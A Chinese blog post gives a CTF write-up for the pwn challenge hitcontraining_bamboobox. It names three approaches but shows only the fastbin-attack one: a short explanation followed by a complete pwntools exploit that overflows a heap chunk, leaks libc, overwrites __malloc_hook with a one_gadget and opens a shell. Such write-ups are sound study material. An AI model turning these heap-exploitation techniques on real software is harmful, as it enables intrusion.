BUU PWN hitcontraining_bamboobox

  本来想学习house of force,结果没用就直接做出来了。。。我用了三种方法来做这道题。

  1.fastbins attack

  2.unlink

  3.house of force

  可以改写got表,程序在edit的时候可以进行溢出。

fasbins attack

  通过溢出改写size字段,构造堆块重叠,泄露libc,改写fd指针,通过realloc调整栈帧,打__malloc_hook拿shell。常规操作,直接贴exp了

 1 from pwn import *
 2 
 3 p = process('./pwn')
 4 libc = ELF('./libc.so.6')
 5 context.log_level = 'debug'
 6 
 7 def duan():
 8     gdb.attach(p)
 9     pause()
10 def add(size,content):
11     p.sendlineafter('choice:','2')
12     p.sendlineafter('name:',str(size))
13     p.sendafter('item:',content)
14 def show():
15     p.sendlineafter('choice:','1')
16 def edit(index,size,content):
17     p.sendlineafter('choice:','3')
18     p.sendlineafter('item:',str(index))
19     p.sendlineafter('name:',str(size))
20     p.sendafter('item:',content)
21 def delete(index):
22     p.sendlineafter('choice:','4')
23     p.sendlineafter('item:',str(index))
24 
25 og = [0x45226,0x4527a,0xf0364,0xf1207]
26 
27 add(0x20,'aaaaaaaa')
28 add(0x20,'bbbbbbbb')
29 add(0x60,'cccccccc')
30 add(0x10,'cccccccc')
31 
32 edit(0,0x30,'a'*0x20+p64(0)+p64(0xa1))
33 delete(1)
34 add(0x20,'aaaaaaaa')
35 show()
36 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.symbols['__malloc_hook']
37 malloc_hook = libc_base+libc.symbols['__malloc_hook']
38 realloc = libc_base+libc.symbols['realloc']
39 print 'libc_base-->'+hex(libc_base)
40 print 'malloc_hook-->'+hex(malloc_hook)
41 shell = libc_base+og[3]
42 
43 add(0x60,'bbbbbbbb')
44 delete(4)
45 edit(2,0x10,p64(malloc_hook-0x23))
46 add(0x60,'aaaaaaaa')
47 add(0x60,'a'*(0x13-0x8)+p64(shell)+p64(realloc+20))
48 p.sendlineafter('choice:','2')
49 p.sendlineafter('name:',str(0x10))
50 p.interactive()

 

posted @ 2021-01-21 13:05  不会修电脑  阅读(263)  评论(0编辑  收藏  举报